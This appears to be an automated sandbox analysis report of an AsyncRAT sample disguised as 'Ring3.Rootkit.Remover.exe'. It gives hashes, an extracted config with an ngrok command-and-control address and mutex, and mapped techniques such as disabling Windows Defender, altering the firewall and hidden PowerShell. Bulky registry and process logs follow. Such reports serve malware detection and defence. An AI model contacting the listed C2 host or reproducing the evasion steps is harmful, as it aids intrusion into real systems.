asyncrat | 906f16836d4ed91fbaf79a1e21a140a4a29783f3b21e55ae4247f26c1916d70f

Analysis

max time kernel
442s
max time network
602s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
08/05/2024, 01:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ring3.Rootkit.Remover.exe
Size

151KB
MD5

d58b5b6cfcaf63f9dd9015fadf8e8223
SHA1

f927a187ca142b03f5dc0c49804fb6eb4425f3f3
SHA256

906f16836d4ed91fbaf79a1e21a140a4a29783f3b21e55ae4247f26c1916d70f
SHA512

cb5d0832d00cd5cf72734425d0bae5039e1356a1da1105af6260468e1420e3207d90fbe09a9019134b0a1d6528ff3f84f2b025d6111cde2364eb255c5c885b47
SSDEEP

3072:6J/Rm34y9GUVkpj3KOVgHqMPfKVqcbYA/LzNAtV:6nm34y9D2pj3TgnKVqc0B

Score

10^/10

asyncrat default evasion execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

0.tcp.eu.ngrok.io:12437

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/5792-1185-0x000002AA7D140000-0x000002AA7D14E000-memory.dmp	disable_win_def

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/5792-821-0x000002AA7C650000-0x000002AA7C662000-memory.dmp	family_asyncrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
573	5792	powershell.exe
574	5792	powershell.exe
575	5792	powershell.exe
576	5792	powershell.exe
577	5792	powershell.exe
579	5792	powershell.exe
598	5792	powershell.exe
601	5792	powershell.exe
602	5792	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6916	powershell.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6784	netsh.exe
340	netsh.exe
3268	netsh.exe
3280	netsh.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
512	0.tcp.eu.ngrok.io
650	0.tcp.eu.ngrok.io

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Parameters.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\State.evtx	svchost.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6964	sc.exe
4460	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Collects information from the system 1 TTPs 2 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1580	WMIC.exe
6220	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
6436	tasklist.exe
3068	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6452	ipconfig.exe
7036	NETSTAT.EXE
1552	ipconfig.exe
3064	NETSTAT.EXE

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3308	systeminfo.exe
1604	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Main	Explorer.EXE

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133596068577153638"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe

Modifies registry class 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133596072695725584"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133596072424943975"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ITT = "133596072427600211"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = 2c0000000000000001000000ffffffffffffffffffffffffffffffff28000000000000005803000081020000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 26cf837beba0da01	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133596072698381350"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133596072421819130"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133596072333189083"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133579944932397867"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133596072372137358"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596072193970441"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133579944932710459"	svchost.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Client.bat:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Roaming\$phantom-startup_str_412.bat\:Zone.Identifier:$DATA	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2140	Ring3.Rootkit.Remover.exe
2140	Ring3.Rootkit.Remover.exe
2104	chrome.exe
2104	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
404	powershell.exe
404	powershell.exe
404	powershell.exe
6916	powershell.exe
6916	powershell.exe
6916	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe
5792	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3316	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe
2104	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2140	Ring3.Rootkit.Remover.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
Token: SeCreatePagefilePrivilege	2104	chrome.exe
Token: SeShutdownPrivilege	2104	chrome.exe
